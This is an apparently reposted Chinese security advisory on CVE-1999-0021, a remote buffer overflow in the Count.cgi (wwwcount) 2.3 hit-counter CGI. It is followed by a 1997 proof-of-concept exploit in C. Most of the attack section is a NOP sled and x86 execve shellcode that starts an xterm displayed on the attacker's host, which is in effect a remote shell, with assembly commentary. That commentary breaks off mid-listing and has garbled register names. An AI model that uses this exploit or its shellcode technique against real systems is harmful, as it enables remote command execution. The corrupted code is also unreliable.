Count.cgi (wwwcount)远程缓冲区溢出漏洞

发布日期：1997-10-16
更新日期：1999-01-01

受影响系统：

Muhammad A. Muquit wwwcount 2.3

不受影响系统：

Muhammad A. Muquit wwwcount 2.4

描述：

---

BUGTRAQ ID: 128
CVE(CAN) ID: CVE-1999-0021

Count.cgi (wwwcount)是一个非常流行的Web站点跟踪统计CGI程序。一般它作为Web页面点击数统计。

1997年10月，这个程序被发现了两个远程漏洞。第一个漏洞比较轻微，它能允许远程用户浏览到受限制的.GIF文件，可能泄漏.GIF文件里潜在的敏感数据。

第二个漏洞比较严重，count.cgi程序在处理QUERY_STRING环境变量的时候存在缓冲区溢出漏洞。远程攻击者可以发送一个超长的请求给程序就能进行溢出攻击，以Web用户的权限在系统执行任意命令。

<*来源：Nicolas Dubee （dube0866@eurobretagne.fr）

链接：http://online.securityfocus.com/advisories/171
http://online.securityfocus.com/archive/1/7762
http://online.securityfocus.com/archive/1/7786
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Nicolas Dubee（dube0866@eurobretagne.fr） 提供了如下测试程序：

/*

Count.cgi (wwwcount) linux test exploit
(c) 05/1997 by plaguez - dube0866@eurobretagne.fr
Contact me if you manage to improve this crap.

This program needs drastic changes to be useable.
If you can't understand how to modify it for your own purpose,
please do not consider trying it.

*/


#include <stdio.h>
#include <stdlib.h>

char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d"
"\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56"
"\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d"
"\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0"
"127.000.000.001:00"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff";


/*

Assembly stuff for the previous buffer.
This basically implements an execve syscall, by creating
an array of char* (needs to put a null byte at the end of
all strings).
Here we gonna exec an xterm and send it to our host.
(you can't simply exec a shell due to the cgi proto).

jmp 60
popl %esi
xorl 陎,陎 # efface eax
movl %esi,靫 # recupere l'adresse du buffer
leal 0x18(%esi),離 # recupere l'adresse des chaines

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有